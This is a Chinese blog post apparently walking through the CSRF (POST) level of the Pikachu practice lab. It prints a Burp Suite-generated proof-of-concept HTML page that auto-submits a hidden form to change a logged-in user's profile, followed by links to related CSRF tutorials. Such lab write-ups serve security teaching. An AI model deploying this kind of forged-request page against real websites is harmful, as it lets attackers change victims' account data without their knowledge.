Pikachu-csrf-CSRF(POST)

于 2024-10-03 04:21:19 发布
阅读量90 收藏
点赞数 1
分类专栏: pikachu通关 文章标签: csrf 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanrongl/article/details/142688063
版权

发起请求

拦截抓包,在请求信息中, Engagement Tool --》generate CSRF PoC 

得到以下 html 代码 ,生成poc.html 文件,当用户点击

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.3.224:8082/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="11" />
      <input type="hidden" name="phonenum" value="11" />
      <input type="hidden" name="add" value="11" />
      <input type="hidden" name="email" value="1234" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

打开 poc.html 页面,点击submit request ,即可达成攻击;

什么鬼昵称
关注
专栏目录
pikachu-CSRF
weixin_44477223的博客
11-11 289
1. CSRF-跨站请求伪造 1.1 什么是CSRF Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 这里列举一个场景解释一下,希望能够帮助你理解。 场景需求: 小黑想要修
pikachu-CSRF(跨站请求伪造)
a1245678899的博客
11-10 625
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。点击修改个人信息然后使用burpsuite抓包可以看到这个数据的传输过程是get型,数据包含在URL之中直接在URL之中构造包含自己信息的网址,伪造一下,诱导用户去点击。当链接被点击以后,可以看到信息已经被修改。
pikachu-CSRF通关教程
m0_71518346的博客
12-09 624
概念:也被称为“One Click Attack”或者“Session Riding”,通过伪装来自受信任用户的请求来攻击受信任的网站。
pikachu靶场-csrf
mlws1900的博客
04-22 694
csrf(英语:Cross-site request forgery),也被称为或者,通常缩写为或者, 是一种挟制用户在当前已登录的Web上执行非本意的操作的攻击方法。跟(XSS)相比,利用的是用户对指定网站的信任,CSRF 利用的是对用户的信任。csrf与xss的区别如下xss:中文名称跨站脚本攻击,通常出现在搜索框、留言板、评论区等地方分类:反射性、存储型、DOM 型攻击方式:构造恶意链接,诱骗用户点击盗取用户的 cookie 信息。
Pikachu靶场-CSRF
若把此心以学道,即身成佛有何难
12-28 317
文笔生疏,措辞浅薄,望各位大佬不吝赐教,感激不尽。
pikachu--CSRF & SSRF
weixin_44769042的博客
09-10 328
1.CSRF Cross-Site Request Forgery 跨站请求伪造 y原理 :当我们打开或登录某个网站,浏览器与网站所存放的服务器会产生一个会话,之后一段时间,所有通过这个认证会话的请求,都会被视为可信的动作,比如此时你正登录网上银行,正在转账,此时攻击者构造恶意转账代码,当你不小心点击它时,就会完成相应的转账操作,因为此时浏览器认为这是可信的正常操作。 在pikachu上验证: (1)攻击场景(GET) 点击修改信息,用burpsuite抓包,...
pikachu(皮卡丘)--CSRF
m0_74871683的博客
09-16 476
简要概述为1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如:--对敏感信息的操作增加安全的token;--对敏感信息的操作增加安全的验证码;
Pikachu-----CSRF(跨站请求伪造)
m0_65712192的博客
12-19 1623
Pikachu-----CSRF(跨站请求伪造)
pikachu-csrf
qq_43660551的博客
04-25 132
登录vince/123456,点修改个人信息,地址栏看不到url,用bp抓包,直接在url中修改Vince的信息,将修改过的url:xxxxxxxx/pikachu/vul/csrf/csrfget/csrf_get_edit.php?攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。三、CSRF(TOKEN)
pikachu--CSRF实验演练
m0_54024658的博客
06-18 446
CSRF概述 Cross-site request forgery 简称为“CSRF”,中文名称==跨站请求伪造==在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 CSRF与XSS的区别 CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的
pikachu---CSRF漏洞
m0_52822871的博客
09-01 363
一.定义 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中
PikachuCSRF
weixin_44940180的博客
07-05 5694
CSRF漏洞概述 Cross-site request forgery简称为“CSRF”,跨站请求伪造 在CSRF的攻击场景中攻击者会伪造一个请求 (这个请求一般是一个链接) 然后欺骗目标用户进行攻击,用户一旦点击了这个请求 整个攻击也就完成了 所以CSRF攻击也被称为“one click”攻击 为什么会出现CSRF漏洞 一方面,用户安全意识不足,访问不知名的url 另一方面,web没有做到准确的合法用户验证 CSRF与XSS的区别: CSRF攻击者并没有拿到用户的权限,是借用户的权限完成攻击;而XSS可以
Web安全 - 跨站点请求伪造CSRF(Cross Site Request Forgery)
小工匠
09-29 1171
CSRF (Cross-Site Request Forgery,跨站请求伪造) 是一种攻击方式,攻击者诱导用户在不知情的情况下发起非授权的请求。例如,用户在登录某个站点后,攻击者通过社交工程等手段诱使用户点击包含恶意请求的链接,利用用户已登录的状态,发起用户意图之外的操作,如转账、修改账户设置等。:在每次受保护的请求中,服务器生成一个唯一的CSRF Token,注入到表单或请求头中。:对于敏感操作,可以要求用户进行额外的身份验证,如验证码或短信验证,防止攻击者即便利用用户的认证状态,也无法完成关键操作。
登录功能开发 P167重点
最新发布
2303_81204446的博客
09-30 262
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 494
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
第十一章 【前端】调用接口(11.1)——Vite 环境变量
qdbest的专栏
09-29 91
Vite。
前端规范工程-2:JS代码规范(Prettier + ESLint)
Vinca@的博客
09-26 815
Prettier 主要关注代码的格式,而 ESLint 则关注代码的质量和规范。结合使用这两个工具,可以极大地提高代码的可读性和维护性,同时减少潜在的错误和不一致性。
pikachu靶场csrf通关post
08-16
您好!对于Pikachu靶场的CSRF通关,您需要使用POST请求来成功完成。具体步骤如下: 1. 首先,您需要了解目标网站的CSRF防护机制。通常情况下,目标网站会在用户进行敏感操作时,要求附带一个CSRF令牌(或称为防护令牌)作为验证。该令牌是动态生成的,每次请求都会改变。 2. 打开Pikachu靶场,并找到适合练习CSRF的目标页面。可以通过查看源代码或使用开发者工具来分析页面的结构和请求。 3. 在发起POST请求之前,您需要获取有效的CSRF令牌。可以通过以下几种方式来获取: - 查找页面源代码:有些网站将CSRF令牌嵌入到HTML源代码中,您可以通过搜索关键词(如“csrf”、“token”等)来找到并提取令牌。 - 使用开发者工具:在浏览器的开发者工具中的Network选项卡中,可以查看请求头中是否包含CSRF令牌。如果有,请将其提取出来。 - 通过其他方式:有些网站可能会将CSRF令牌存储在Cookie中或作为请求参数传递。您可以使用相应的方法来获取令牌。 4. 获取到有效的CSRF令牌后,您可以构造POST请求并添加必要的参数。在请求头中,务必包含正确的CSRF令牌,以通过服务器的验证。根据具体情况,您可能还需要添加其他必要的参数,比如用户名、密码等。 5. 发送POST请求,并解析服务器返回的响应。根据具体要求,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值